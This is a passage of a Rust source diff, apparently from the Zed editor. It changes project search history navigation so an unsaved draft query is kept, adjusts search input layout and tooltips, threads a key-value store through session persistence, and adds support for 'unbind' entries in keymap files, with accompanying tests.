+ cx.propagate();
+ return;
+ }
+
if editor.read(cx).text(cx).is_empty()
&& let Some(new_query) = search_view
.entity
@@ -1982,12 +2069,13 @@ impl ProjectSearchBar {
return;
}
+ let current_query = editor.read(cx).text(cx);
if let Some(new_query) = search_view.entity.update(cx, |model, cx| {
let project = model.project.clone();
project.update(cx, |project, _| {
project
.search_history_mut(kind)
- .previous(model.cursor_mut(kind))
+ .previous(model.cursor_mut(kind), ¤t_query)
.map(str::to_string)
})
}) {
@@ -2086,7 +2174,11 @@ impl Render for ProjectSearchBar {
.on_action(
cx.listener(|this, action, window, cx| this.next_history_query(action, window, cx)),
)
- .child(render_text_input(&search.query_editor, color_override, cx))
+ .child(div().flex_1().py_1().child(render_text_input(
+ &search.query_editor,
+ color_override,
+ cx,
+ )))
.child(
h_flex()
.gap_1()
@@ -2244,18 +2336,22 @@ impl Render for ProjectSearchBar {
.child(mode_column);
let replace_line = search.replace_enabled.then(|| {
- let replace_column = input_base_styles(InputPanel::Replacement)
- .child(render_text_input(&search.replacement_editor, None, cx));
+ let replace_column = input_base_styles(InputPanel::Replacement).child(
+ div().flex_1().py_1().child(render_text_input(
+ &search.replacement_editor,
+ None,
+ cx,
+ )),
+ );
let focus_handle = search.replacement_editor.read(cx).focus_handle(cx);
-
let replace_actions = h_flex()
.min_w_64()
.gap_1()
.child(render_action_button(
"project-search-replace-button",
IconName::ReplaceNext,
- Default::default(),
+ is_search_underway.then_some(ActionButtonState::Disabled),
"Replace Next Match",
&ReplaceNext,
focus_handle.clone(),
@@ -2519,7 +2615,7 @@ pub mod tests {
use gpui::{Action, TestAppContext, VisualTestContext, WindowHandle};
use language::{FakeLspAdapter, rust_lang};
use pretty_assertions::assert_eq;
- use project::FakeFs;
+ use project::{FakeFs, Fs};
use serde_json::json;
use settings::{
InlayHintSettingsContent, SettingsStore, ThemeColorsContent, ThemeStyleContent,
@@ -3845,7 +3941,7 @@ pub mod tests {
})
.unwrap();
- // Next history query after the latest should set the query to the empty string.
+ // Next history query after the latest should preserve the current query.
window
.update(cx, |_, window, cx| {
search_bar.update(cx, |search_bar, cx| {
@@ -3857,7 +3953,10 @@ pub mod tests {
window
.update(cx, |_, _, cx| {
search_view.update(cx, |search_view, cx| {
- assert_eq!(search_view.query_editor.read(cx).text(cx), "");
+ assert_eq!(
+ search_view.query_editor.read(cx).text(cx),
+ "JUST_TEXT_INPUT"
+ );
assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE);
});
})
@@ -3873,13 +3972,16 @@ pub mod tests {
window
.update(cx, |_, _, cx| {
search_view.update(cx, |search_view, cx| {
- assert_eq!(search_view.query_editor.read(cx).text(cx), "");
+ assert_eq!(
+ search_view.query_editor.read(cx).text(cx),
+ "JUST_TEXT_INPUT"
+ );
assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE);
});
})
.unwrap();
- // First previous query for empty current query should set the query to the latest submitted one.
+ // Previous query should navigate backwards through history.
window
.update(cx, |_, window, cx| {
search_bar.update(cx, |search_bar, cx| {
@@ -3891,7 +3993,7 @@ pub mod tests {
window
.update(cx, |_, _, cx| {
search_view.update(cx, |search_view, cx| {
- assert_eq!(search_view.query_editor.read(cx).text(cx), "THREE");
+ assert_eq!(search_view.query_editor.read(cx).text(cx), "TWO");
assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE);
});
})
@@ -3909,7 +4011,7 @@ pub mod tests {
window
.update(cx, |_, _, cx| {
search_view.update(cx, |search_view, cx| {
- assert_eq!(search_view.query_editor.read(cx).text(cx), "TWO");
+ assert_eq!(search_view.query_editor.read(cx).text(cx), "ONE");
assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE);
});
})
@@ -4063,11 +4165,75 @@ pub mod tests {
window
.update(cx, |_, _, cx| {
search_view.update(cx, |search_view, cx| {
- assert_eq!(search_view.query_editor.read(cx).text(cx), "");
+ assert_eq!(search_view.query_editor.read(cx).text(cx), "TWO_NEW");
assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE);
});
})
.unwrap();
+
+ // Typing text without running a search, then navigating history, should allow
+ // restoring the draft when pressing next past the end.
+ window
+ .update(cx, |_, window, cx| {
+ search_view.update(cx, |search_view, cx| {
+ search_view.query_editor.update(cx, |query_editor, cx| {
+ query_editor.set_text("unsaved draft", window, cx)
+ });
+ })
+ })
+ .unwrap();
+ cx.background_executor.run_until_parked();
+
+ // Navigate up into history — the draft should be stashed.
+ window
+ .update(cx, |_, window, cx| {
+ search_bar.update(cx, |search_bar, cx| {
+ search_bar.focus_search(window, cx);
+ search_bar.previous_history_query(&PreviousHistoryQuery, window, cx);
+ });
+ })
+ .unwrap();
+ window
+ .update(cx, |_, _, cx| {
+ search_view.update(cx, |search_view, cx| {
+ assert_eq!(search_view.query_editor.read(cx).text(cx), "THREE");
+ });
+ })
+ .unwrap();
+
+ // Navigate forward through history.
+ window
+ .update(cx, |_, window, cx| {
+ search_bar.update(cx, |search_bar, cx| {
+ search_bar.focus_search(window, cx);
+ search_bar.next_history_query(&NextHistoryQuery, window, cx);
+ });
+ })
+ .unwrap();
+ window
+ .update(cx, |_, _, cx| {
+ search_view.update(cx, |search_view, cx| {
+ assert_eq!(search_view.query_editor.read(cx).text(cx), "TWO_NEW");
+ });
+ })
+ .unwrap();
+
+ // Navigate past the end — the draft should be restored.
+ window
+ .update(cx, |_, window, cx| {
+ search_bar.update(cx, |search_bar, cx| {
+ search_bar.focus_search(window, cx);
+ search_bar.next_history_query(&NextHistoryQuery, window, cx);
+ });
+ })
+ .unwrap();
+ window
+ .update(cx, |_, _, cx| {
+ search_view.update(cx, |search_view, cx| {
+ assert_eq!(search_view.query_editor.read(cx).text(cx), "unsaved draft");
+ });
+ })
+ .unwrap();
}
#[perf]
@@ -4253,9 +4419,6 @@ pub mod tests {
cx.background_executor.run_until_parked();
select_next_history_item(&search_bar_2, cx);
- assert_eq!(active_query(&search_view_2, cx), "");
-
- select_prev_history_item(&search_bar_2, cx);
assert_eq!(active_query(&search_view_2, cx), "THREE");
select_prev_history_item(&search_bar_2, cx);
@@ -4267,6 +4430,9 @@ pub mod tests {
select_prev_history_item(&search_bar_2, cx);
assert_eq!(active_query(&search_view_2, cx), "ONE");
+ select_prev_history_item(&search_bar_2, cx);
+ assert_eq!(active_query(&search_view_2, cx), "ONE");
+
// Search view 1 should now see the query from search view 2.
assert_eq!(active_query(&search_view_1, cx), "ONE");
@@ -4278,7 +4444,7 @@ pub mod tests {
assert_eq!(active_query(&search_view_2, cx), "THREE");
select_next_history_item(&search_bar_2, cx);
- assert_eq!(active_query(&search_view_2, cx), "");
+ assert_eq!(active_query(&search_view_2, cx), "THREE");
select_next_history_item(&search_bar_1, cx);
assert_eq!(active_query(&search_view_1, cx), "TWO");
@@ -4287,7 +4453,7 @@ pub mod tests {
assert_eq!(active_query(&search_view_1, cx), "THREE");
select_next_history_item(&search_bar_1, cx);
- assert_eq!(active_query(&search_view_1, cx), "");
+ assert_eq!(active_query(&search_view_1, cx), "THREE");
}
#[perf]
@@ -4887,6 +5053,91 @@ pub mod tests {
.unwrap();
}
+ #[gpui::test]
+ async fn test_deleted_file_removed_from_search_results(cx: &mut TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.background_executor.clone());
+ fs.insert_tree(
+ path!("/dir"),
+ json!({
+ "file_a.txt": "hello world",
+ "file_b.txt": "hello universe",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await;
+ let window =
+ cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let search = cx.new(|cx| ProjectSearch::new(project.clone(), cx));
+ let search_view = cx.add_window(|window, cx| {
+ ProjectSearchView::new(workspace.downgrade(), search.clone(), window, cx, None)
+ });
+
+ perform_search(search_view, "hello", cx);
+
+ search_view
+ .update(cx, |search_view, _window, cx| {
+ let match_count = search_view.entity.read(cx).match_ranges.len();
+ assert_eq!(match_count, 2, "Should have matches from both files");
+ })
+ .unwrap();
+
+ // Delete file_b.txt
+ fs.remove_file(
+ path!("/dir/file_b.txt").as_ref(),
+ fs::RemoveOptions::default(),
+ )
+ .await
+ .unwrap();
+ cx.run_until_parked();
+
+ // Verify deleted file's results are removed proactively
+ search_view
+ .update(cx, |search_view, _window, cx| {
+ let results_text = search_view
+ .results_editor
+ .update(cx, |editor, cx| editor.display_text(cx));
+ assert!(
+ !results_text.contains("universe"),
+ "Deleted file's content should be removed from results, got: {results_text}"
+ );
+ assert!(
+ results_text.contains("world"),
+ "Remaining file's content should still be present, got: {results_text}"
+ );
+ })
+ .unwrap();
+
+ // Re-run the search and verify deleted file stays gone
+ perform_search(search_view, "hello", cx);
+
+ search_view
+ .update(cx, |search_view, _window, cx| {
+ let results_text = search_view
+ .results_editor
+ .update(cx, |editor, cx| editor.display_text(cx));
+ assert!(
+ !results_text.contains("universe"),
+ "Deleted file should not reappear after re-search, got: {results_text}"
+ );
+ assert!(
+ results_text.contains("world"),
+ "Remaining file should still be found, got: {results_text}"
+ );
+ assert_eq!(
+ search_view.entity.read(cx).match_ranges.len(),
+ 1,
+ "Should only have match from the remaining file"
+ );
+ })
+ .unwrap();
+ }
+
fn init_test(cx: &mut TestAppContext) {
cx.update(|cx| {
let settings = SettingsStore::test(cx);
@@ -1,10 +1,37 @@
-use editor::{Editor, EditorElement, EditorStyle};
-use gpui::{Action, Entity, FocusHandle, Hsla, IntoElement, TextStyle};
+use editor::{Editor, EditorElement, EditorStyle, MultiBufferOffset, ToOffset};
+use gpui::{Action, App, Entity, FocusHandle, Hsla, IntoElement, TextStyle};
use settings::Settings;
use theme::ThemeSettings;
use ui::{IconButton, IconButtonShape};
use ui::{Tooltip, prelude::*};
+pub(super) enum HistoryNavigationDirection {
+ Previous,
+ Next,
+}
+
+pub(super) fn should_navigate_history(
+ editor: &Entity<Editor>,
+ direction: HistoryNavigationDirection,
+ cx: &App,
+) -> bool {
+ let editor_ref = editor.read(cx);
+ let snapshot = editor_ref.buffer().read(cx).snapshot(cx);
+ if snapshot.max_point().row == 0 {
+ return true;
+ }
+ let selections = editor_ref.selections.disjoint_anchors();
+ if let [selection] = selections {
+ let offset = selection.end.to_offset(&snapshot);
+ match direction {
+ HistoryNavigationDirection::Previous => offset == MultiBufferOffset(0),
+ HistoryNavigationDirection::Next => offset == snapshot.len(),
+ }
+ } else {
+ true
+ }
+}
+
pub(super) enum ActionButtonState {
Disabled,
Toggled,
@@ -43,7 +70,7 @@ pub(crate) fn input_base_styles(border_color: Hsla, map: impl FnOnce(Div) -> Div
h_flex()
.map(map)
.min_w_32()
- .h_8()
+ .min_h_8()
.pl_2()
.pr_1()
.border_1()
@@ -1,15 +1,20 @@
use editor::EditorSettings;
+use gpui::FocusHandle;
use settings::Settings as _;
use ui::{ButtonCommon, Clickable, Context, Render, Tooltip, Window, prelude::*};
use workspace::{ItemHandle, StatusItemView};
pub const SEARCH_ICON: IconName = IconName::MagnifyingGlass;
-pub struct SearchButton;
+pub struct SearchButton {
+ pane_item_focus_handle: Option<FocusHandle>,
+}
impl SearchButton {
pub fn new() -> Self {
- Self {}
+ Self {
+ pane_item_focus_handle: None,
+ }
}
}
@@ -21,11 +26,25 @@ impl Render for SearchButton {
return button.hidden();
}
+ let focus_handle = self.pane_item_focus_handle.clone();
button.child(
IconButton::new("project-search-indicator", SEARCH_ICON)
.icon_size(IconSize::Small)
- .tooltip(|_window, cx| {
- Tooltip::for_action("Project Search", &workspace::DeploySearch::default(), cx)
+ .tooltip(move |_window, cx| {
+ if let Some(focus_handle) = &focus_handle {
+ Tooltip::for_action_in(
+ "Project Search",
+ &workspace::DeploySearch::default(),
+ focus_handle,
+ cx,
+ )
+ } else {
+ Tooltip::for_action(
+ "Project Search",
+ &workspace::DeploySearch::default(),
+ cx,
+ )
+ }
})
.on_click(cx.listener(|_this, _, window, cx| {
window.dispatch_action(Box::new(workspace::DeploySearch::default()), cx);
@@ -37,9 +56,10 @@ impl Render for SearchButton {
impl StatusItemView for SearchButton {
fn set_active_pane_item(
&mut self,
- _active_pane_item: Option<&dyn ItemHandle>,
+ active_pane_item: Option<&dyn ItemHandle>,
_window: &mut Window,
- _cx: &mut Context<Self>,
+ cx: &mut Context<Self>,
) {
+ self.pane_item_focus_handle = active_pane_item.map(|item| item.item_focus_handle(cx));
}
}
@@ -1,4 +1,4 @@
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use gpui::{App, AppContext as _, Context, Subscription, Task, WindowId};
use util::ResultExt;
@@ -12,20 +12,19 @@ const SESSION_ID_KEY: &str = "session_id";
const SESSION_WINDOW_STACK_KEY: &str = "session_window_stack";
impl Session {
- pub async fn new(session_id: String) -> Self {
- let old_session_id = KEY_VALUE_STORE.read_kvp(SESSION_ID_KEY).ok().flatten();
+ pub async fn new(session_id: String, db: KeyValueStore) -> Self {
+ let old_session_id = db.read_kvp(SESSION_ID_KEY).ok().flatten();
- KEY_VALUE_STORE
- .write_kvp(SESSION_ID_KEY.to_string(), session_id.clone())
+ db.write_kvp(SESSION_ID_KEY.to_string(), session_id.clone())
.await
.log_err();
- let old_window_ids = KEY_VALUE_STORE
+ let old_window_ids = db
.read_kvp(SESSION_WINDOW_STACK_KEY)
.ok()
.flatten()
.and_then(|json| serde_json::from_str::<Vec<u64>>(&json).ok())
- .map(|vec| {
+ .map(|vec: Vec<u64>| {
vec.into_iter()
.map(WindowId::from)
.collect::<Vec<WindowId>>()
@@ -72,25 +71,28 @@ impl AppSession {
let _subscriptions = vec![cx.on_app_quit(Self::app_will_quit)];
#[cfg(not(any(test, feature = "test-support")))]
- let _serialization_task = cx.spawn(async move |_, cx| {
- // Disabled in tests: the infinite loop bypasses "parking forbidden" checks,
- // causing tests to hang instead of panicking.
- {
- let mut current_window_stack = Vec::new();
- loop {
- if let Some(windows) = cx.update(|cx| window_stack(cx))
- && windows != current_window_stack
- {
- store_window_stack(&windows).await;
- current_window_stack = windows;
+ let _serialization_task = {
+ let db = KeyValueStore::global(cx);
+ cx.spawn(async move |_, cx| {
+ // Disabled in tests: the infinite loop bypasses "parking forbidden" checks,
+ // causing tests to hang instead of panicking.
+ {
+ let mut current_window_stack = Vec::new();
+ loop {
+ if let Some(windows) = cx.update(|cx| window_stack(cx))
+ && windows != current_window_stack
+ {
+ store_window_stack(db.clone(), &windows).await;
+ current_window_stack = windows;
+ }
+
+ cx.background_executor()
+ .timer(std::time::Duration::from_millis(500))
+ .await;
}
-
- cx.background_executor()
- .timer(std::time::Duration::from_millis(500))
- .await;
}
- }
- });
+ })
+ };
#[cfg(any(test, feature = "test-support"))]
let _serialization_task = Task::ready(());
@@ -104,7 +106,8 @@ impl AppSession {
fn app_will_quit(&mut self, cx: &mut Context<Self>) -> Task<()> {
if let Some(window_stack) = window_stack(cx) {
- cx.background_spawn(async move { store_window_stack(&window_stack).await })
+ let db = KeyValueStore::global(cx);
+ cx.background_spawn(async move { store_window_stack(db, &window_stack).await })
} else {
Task::ready(())
}
@@ -137,10 +140,9 @@ fn window_stack(cx: &App) -> Option<Vec<u64>> {
)
}
-async fn store_window_stack(windows: &[u64]) {
+async fn store_window_stack(db: KeyValueStore, windows: &[u64]) {
if let Ok(window_ids_json) = serde_json::to_string(windows) {
- KEY_VALUE_STORE
- .write_kvp(SESSION_WINDOW_STACK_KEY.to_string(), window_ids_json)
+ db.write_kvp(SESSION_WINDOW_STACK_KEY.to_string(), window_ids_json)
.await
.log_err();
}
@@ -4,7 +4,7 @@ use fs::Fs;
use gpui::{
Action, ActionBuildError, App, InvalidKeystrokeError, KEYSTROKE_PARSE_EXPECTED_MESSAGE,
KeyBinding, KeyBindingContextPredicate, KeyBindingMetaIndex, KeybindingKeystroke, Keystroke,
- NoAction, SharedString, generate_list_of_all_registered_actions, register_action,
+ NoAction, SharedString, Unbind, generate_list_of_all_registered_actions, register_action,
};
use schemars::{JsonSchema, json_schema};
use serde::Deserialize;
@@ -73,6 +73,10 @@ pub struct KeymapSection {
/// on macOS. See the documentation for more details.
#[serde(default)]
use_key_equivalents: bool,
+ /// This keymap section's unbindings, as a JSON object mapping keystrokes to actions. These are
+ /// parsed before `bindings`, so bindings later in the same section can still take precedence.
+ #[serde(default)]
+ unbind: Option<IndexMap<String, UnbindTargetAction>>,
/// This keymap section's bindings, as a JSON object mapping keystrokes to actions. The
/// keystrokes key is a string representing a sequence of keystrokes to type, where the
/// keystrokes are separated by whitespace. Each keystroke is a sequence of modifiers (`ctrl`,
@@ -135,6 +139,20 @@ impl JsonSchema for KeymapAction {
}
}
+#[derive(Debug, Deserialize, Default, Clone)]
+#[serde(transparent)]
+pub struct UnbindTargetAction(Value);
+
+impl JsonSchema for UnbindTargetAction {
+ fn schema_name() -> Cow<'static, str> {
+ "UnbindTargetAction".into()
+ }
+
+ fn json_schema(_: &mut schemars::SchemaGenerator) -> schemars::Schema {
+ json_schema!(true)
+ }
+}
+
#[derive(Debug)]
#[must_use]
pub enum KeymapFileLoadResult {
@@ -231,6 +249,7 @@ impl KeymapFile {
for KeymapSection {
context,
use_key_equivalents,
+ unbind,
bindings,
unrecognized_fields,
} in keymap_file.0.iter()
@@ -244,7 +263,7 @@ impl KeymapFile {
// Leading space is to separate from the message indicating which section
// the error occurred in.
errors.push((
- context,
+ context.clone(),
format!(" Parse error in section `context` field: {}", err),
));
continue;
@@ -263,6 +282,38 @@ impl KeymapFile {
.unwrap();
}
+ if let Some(unbind) = unbind {
+ for (keystrokes, action) in unbind {
+ let result = Self::load_unbinding(
+ keystrokes,
+ action,
+ context_predicate.clone(),
+ *use_key_equivalents,
+ cx,
+ );
+ match result {
+ Ok(key_binding) => {
+ key_bindings.push(key_binding);
+ }
+ Err(err) => {
+ let mut lines = err.lines();
+ let mut indented_err = lines.next().unwrap().to_string();
+ for line in lines {
+ indented_err.push_str(" ");
+ indented_err.push_str(line);
+ indented_err.push_str("\n");
+ }
+ write!(
+ section_errors,
+ "\n\n- In unbind {}, {indented_err}",
+ MarkdownInlineCode(&format!("\"{}\"", keystrokes))
+ )
+ .unwrap();
+ }
+ }
+ }
+ }
+
if let Some(bindings) = bindings {
for (keystrokes, action) in bindings {
let result = Self::load_keybinding(
@@ -296,7 +347,7 @@ impl KeymapFile {
}
if !section_errors.is_empty() {
- errors.push((context, section_errors))
+ errors.push((context.clone(), section_errors))
}
}
@@ -332,7 +383,17 @@ impl KeymapFile {
use_key_equivalents: bool,
cx: &App,
) -> std::result::Result<KeyBinding, String> {
- let (action, action_input_string) = Self::build_keymap_action(action, cx)?;
+ Self::load_keybinding_action_value(keystrokes, &action.0, context, use_key_equivalents, cx)
+ }
+
+ fn load_keybinding_action_value(
+ keystrokes: &str,
+ action: &Value,
+ context: Option<Rc<KeyBindingContextPredicate>>,
+ use_key_equivalents: bool,
+ cx: &App,
+ ) -> std::result::Result<KeyBinding, String> {
+ let (action, action_input_string) = Self::build_keymap_action_value(action, cx)?;
let key_binding = match KeyBinding::load(
keystrokes,
@@ -362,23 +423,70 @@ impl KeymapFile {
}
}
+ fn load_unbinding(
+ keystrokes: &str,
+ action: &UnbindTargetAction,
+ context: Option<Rc<KeyBindingContextPredicate>>,
+ use_key_equivalents: bool,
+ cx: &App,
+ ) -> std::result::Result<KeyBinding, String> {
+ let key_binding = Self::load_keybinding_action_value(
+ keystrokes,
+ &action.0,
+ context,
+ use_key_equivalents,
+ cx,
+ )?;
+
+ if key_binding.action().partial_eq(&NoAction) {
+ return Err("expected action name string or [name, input] array.".to_string());
+ }
+
+ if key_binding.action().name() == Unbind::name_for_type() {
+ return Err(format!(
+ "can't use {} as an unbind target.",
+ MarkdownInlineCode(&format!("\"{}\"", Unbind::name_for_type()))
+ ));
+ }
+
+ KeyBinding::load(
+ keystrokes,
+ Box::new(Unbind(key_binding.action().name().into())),
+ key_binding.predicate(),
+ use_key_equivalents,
+ key_binding.action_input(),
+ cx.keyboard_mapper().as_ref(),
+ )
+ .map_err(|InvalidKeystrokeError { keystroke }| {
+ format!(
+ "invalid keystroke {}. {}",
+ MarkdownInlineCode(&format!("\"{}\"", &keystroke)),
+ KEYSTROKE_PARSE_EXPECTED_MESSAGE
+ )
+ })
+ }
+
pub fn parse_action(
action: &KeymapAction,
) -> Result<Option<(&String, Option<&Value>)>, String> {
- let name_and_input = match &action.0 {
+ Self::parse_action_value(&action.0)
+ }
+
+ fn parse_action_value(action: &Value) -> Result<Option<(&String, Option<&Value>)>, String> {
+ let name_and_input = match action {
Value::Array(items) => {
if items.len() != 2 {
return Err(format!(
"expected two-element array of `[name, input]`. \
Instead found {}.",
- MarkdownInlineCode(&action.0.to_string())
+ MarkdownInlineCode(&action.to_string())
));
}
let serde_json::Value::String(ref name) = items[0] else {
return Err(format!(
"expected two-element array of `[name, input]`, \
but the first element is not a string in {}.",
- MarkdownInlineCode(&action.0.to_string())
+ MarkdownInlineCode(&action.to_string())
));
};
Some((name, Some(&items[1])))
@@ -389,7 +497,7 @@ impl KeymapFile {
return Err(format!(
"expected two-element array of `[name, input]`. \
Instead found {}.",
- MarkdownInlineCode(&action.0.to_string())
+ MarkdownInlineCode(&action.to_string())
));
}
};
@@ -400,7 +508,14 @@ impl KeymapFile {
action: &KeymapAction,
cx: &App,
) -> std::result::Result<(Box<dyn Action>, Option<String>), String> {
- let (build_result, action_input_string) = match Self::parse_action(action)? {
+ Self::build_keymap_action_value(&action.0, cx)
+ }
+
+ fn build_keymap_action_value(
+ action: &Value,
+ cx: &App,
+ ) -> std::result::Result<(Box<dyn Action>, Option<String>), String> {
+ let (build_result, action_input_string) = match Self::parse_action_value(action)? {
Some((name, action_input)) if name.as_str() == ActionSequence::name_for_type() => {
match action_input {
Some(action_input) => (
@@ -583,9 +698,15 @@ impl KeymapFile {
"minItems": 2,
"maxItems": 2
});
- let mut keymap_action_alternatives = vec![empty_action_name, empty_action_name_with_input];
+ let mut keymap_action_alternatives = vec![
+ empty_action_name.clone(),
+ empty_action_name_with_input.clone(),
+ ];
+ let mut unbind_target_action_alternatives =
+ vec![empty_action_name, empty_action_name_with_input];
let mut empty_schema_action_names = vec![];
+ let mut empty_schema_unbind_target_action_names = vec![];
for (name, action_schema) in action_schemas.into_iter() {
let deprecation = if name == NoAction.name() {
Some("null")
@@ -593,6 +714,9 @@ impl KeymapFile {
deprecations.get(name).copied()
};
+ let include_in_unbind_target_schema =
+ name != NoAction.name() && name != Unbind::name_for_type();
+
// Add an alternative for plain action names.
let mut plain_action = json_schema!({
"type": "string",
@@ -607,7 +731,10 @@ impl KeymapFile {
if let Some(description) = &description {
add_description(&mut plain_action, description);
}
- keymap_action_alternatives.push(plain_action);
+ keymap_action_alternatives.push(plain_action.clone());
+ if include_in_unbind_target_schema {
+ unbind_target_action_alternatives.push(plain_action);
+ }
// Add an alternative for actions with data specified as a [name, data] array.
//
@@ -633,9 +760,15 @@ impl KeymapFile {
"minItems": 2,
"maxItems": 2
});
- keymap_action_alternatives.push(action_with_input);
+ keymap_action_alternatives.push(action_with_input.clone());
+ if include_in_unbind_target_schema {
+ unbind_target_action_alternatives.push(action_with_input);
+ }
} else {
empty_schema_action_names.push(name);
+ if include_in_unbind_target_schema {
+ empty_schema_unbind_target_action_names.push(name);
+ }
}
}
@@ -659,20 +792,44 @@ impl KeymapFile {
keymap_action_alternatives.push(actions_with_empty_input);
}
+ if !empty_schema_unbind_target_action_names.is_empty() {
+ let action_names = json_schema!({ "enum": empty_schema_unbind_target_action_names });
+ let no_properties_allowed = json_schema!({
+ "type": "object",
+ "additionalProperties": false
+ });
+ let mut actions_with_empty_input = json_schema!({
+ "type": "array",
+ "items": [action_names, no_properties_allowed],
+ "minItems": 2,
+ "maxItems": 2
+ });
+ add_deprecation(
+ &mut actions_with_empty_input,
+ "This action does not take input - just the action name string should be used."
+ .to_string(),
+ );
+ unbind_target_action_alternatives.push(actions_with_empty_input);
+ }
+
// Placing null first causes json-language-server to default assuming actions should be
// null, so place it last.
keymap_action_alternatives.push(json_schema!({
"type": "null"
}));
- // The `KeymapSection` schema will reference the `KeymapAction` schema by name, so setting
- // the definition of `KeymapAction` results in the full action schema being used.
generator.definitions_mut().insert(
KeymapAction::schema_name().to_string(),
json!({
"anyOf": keymap_action_alternatives
}),
);
+ generator.definitions_mut().insert(
+ UnbindTargetAction::schema_name().to_string(),
+ json!({
+ "anyOf": unbind_target_action_alternatives
+ }),
+ );
generator.root_schema_for::<KeymapFile>().to_value()
}
@@ -701,31 +858,32 @@ impl KeymapFile {
tab_size: usize,
keyboard_mapper: &dyn gpui::PlatformKeyboardMapper,
) -> Result<String> {
- match operation {
+ // When replacing or removing a non-user binding, we may need to write an unbind entry
+ // to suppress the original default binding.
+ let mut suppression_unbind: Option<KeybindUpdateTarget<'_>> = None;
+
+ match &operation {
// if trying to replace a keybinding that is not user-defined, treat it as an add operation
KeybindUpdateOperation::Replace {
target_keybind_source: target_source,
source,
target,
- } if target_source != KeybindSource::User => {
+ } if *target_source != KeybindSource::User => {
+ if target.keystrokes_unparsed() != source.keystrokes_unparsed() {
+ suppression_unbind = Some(target.clone());
+ }
operation = KeybindUpdateOperation::Add {
- source,
- from: Some(target),
+ source: source.clone(),
+ from: Some(target.clone()),
};
}
- // if trying to remove a keybinding that is not user-defined, treat it as creating a binding
- // that binds it to `zed::NoAction`
+ // if trying to remove a keybinding that is not user-defined, treat it as creating an
+ // unbind entry for the removed action
KeybindUpdateOperation::Remove {
target,
target_keybind_source,
- } if target_keybind_source != KeybindSource::User => {
- let mut source = target.clone();
- source.action_name = gpui::NoAction.name();
- source.action_arguments.take();
- operation = KeybindUpdateOperation::Add {
- source,
- from: Some(target),
- };
+ } if *target_keybind_source != KeybindSource::User => {
+ suppression_unbind = Some(target.clone());
}
_ => {}
}
@@ -734,34 +892,41 @@ impl KeymapFile {
// We don't want to modify the file if it's invalid.
let keymap = Self::parse(&keymap_contents).context("Failed to parse keymap")?;
- if let KeybindUpdateOperation::Remove { target, .. } = operation {
- let target_action_value = target
- .action_value()
- .context("Failed to generate target action JSON value")?;
- let Some((index, keystrokes_str)) =
- find_binding(&keymap, &target, &target_action_value, keyboard_mapper)
- else {
- anyhow::bail!("Failed to find keybinding to remove");
- };
- let is_only_binding = keymap.0[index]
- .bindings
- .as_ref()
- .is_none_or(|bindings| bindings.len() == 1);
- let key_path: &[&str] = if is_only_binding {
- &[]
- } else {
- &["bindings", keystrokes_str]
- };
- let (replace_range, replace_value) = replace_top_level_array_value_in_json_text(
- &keymap_contents,
- key_path,
- None,
- None,
- index,
- tab_size,
- );
- keymap_contents.replace_range(replace_range, &replace_value);
- return Ok(keymap_contents);
+ if let KeybindUpdateOperation::Remove {
+ target,
+ target_keybind_source,
+ } = &operation
+ {
+ if *target_keybind_source == KeybindSource::User {
+ let target_action_value = target
+ .action_value()
+ .context("Failed to generate target action JSON value")?;
+ let Some(binding_location) =
+ find_binding(&keymap, target, &target_action_value, keyboard_mapper)
+ else {
+ anyhow::bail!("Failed to find keybinding to remove");
+ };
+ let is_only_binding = binding_location.is_only_entry_in_section(&keymap);
+ let key_path: &[&str] = if is_only_binding {
+ &[]
+ } else {
+ &[
+ binding_location.kind.key_path(),
+ binding_location.keystrokes_str,
+ ]
+ };
+ let (replace_range, replace_value) = replace_top_level_array_value_in_json_text(
+ &keymap_contents,
+ key_path,
+ None,
+ None,
+ binding_location.index,
+ tab_size,
+ );
+ keymap_contents.replace_range(replace_range, &replace_value);
+
+ return Ok(keymap_contents);
+ }
}
if let KeybindUpdateOperation::Replace { source, target, .. } = operation {
@@ -772,7 +937,7 @@ impl KeymapFile {
.action_value()
.context("Failed to generate source action JSON value")?;
- if let Some((index, keystrokes_str)) =
+ if let Some(binding_location) =
find_binding(&keymap, &target, &target_action_value, keyboard_mapper)
{
if target.context == source.context {
@@ -781,30 +946,32 @@ impl KeymapFile {
let (replace_range, replace_value) = replace_top_level_array_value_in_json_text(
&keymap_contents,
- &["bindings", keystrokes_str],
+ &[
+ binding_location.kind.key_path(),
+ binding_location.keystrokes_str,
+ ],
Some(&source_action_value),
Some(&source.keystrokes_unparsed()),
- index,
+ binding_location.index,
tab_size,
);
keymap_contents.replace_range(replace_range, &replace_value);
return Ok(keymap_contents);
- } else if keymap.0[index]
- .bindings
- .as_ref()
- .is_none_or(|bindings| bindings.len() == 1)
- {
+ } else if binding_location.is_only_entry_in_section(&keymap) {
// if we are replacing the only binding in the section,
// just update the section in place, updating the context
// and the binding
let (replace_range, replace_value) = replace_top_level_array_value_in_json_text(
&keymap_contents,
- &["bindings", keystrokes_str],
+ &[
+ binding_location.kind.key_path(),
+ binding_location.keystrokes_str,
+ ],
Some(&source_action_value),
Some(&source.keystrokes_unparsed()),
- index,
+ binding_location.index,
tab_size,
);
keymap_contents.replace_range(replace_range, &replace_value);
@@ -814,7 +981,7 @@ impl KeymapFile {
&["context"],
source.context.map(Into::into).as_ref(),
None,
- index,
+ binding_location.index,
tab_size,
);
keymap_contents.replace_range(replace_range, &replace_value);
@@ -827,10 +994,13 @@ impl KeymapFile {
let (replace_range, replace_value) = replace_top_level_array_value_in_json_text(
&keymap_contents,
- &["bindings", keystrokes_str],
+ &[
+ binding_location.kind.key_path(),
+ binding_location.keystrokes_str,
+ ],
None,
None,
- index,
+ binding_location.index,
tab_size,
);
keymap_contents.replace_range(replace_range, &replace_value);
@@ -865,8 +1035,9 @@ impl KeymapFile {
}
let use_key_equivalents = from.and_then(|from| {
let action_value = from.action_value().context("Failed to serialize action value. `use_key_equivalents` on new keybinding may be incorrect.").log_err()?;
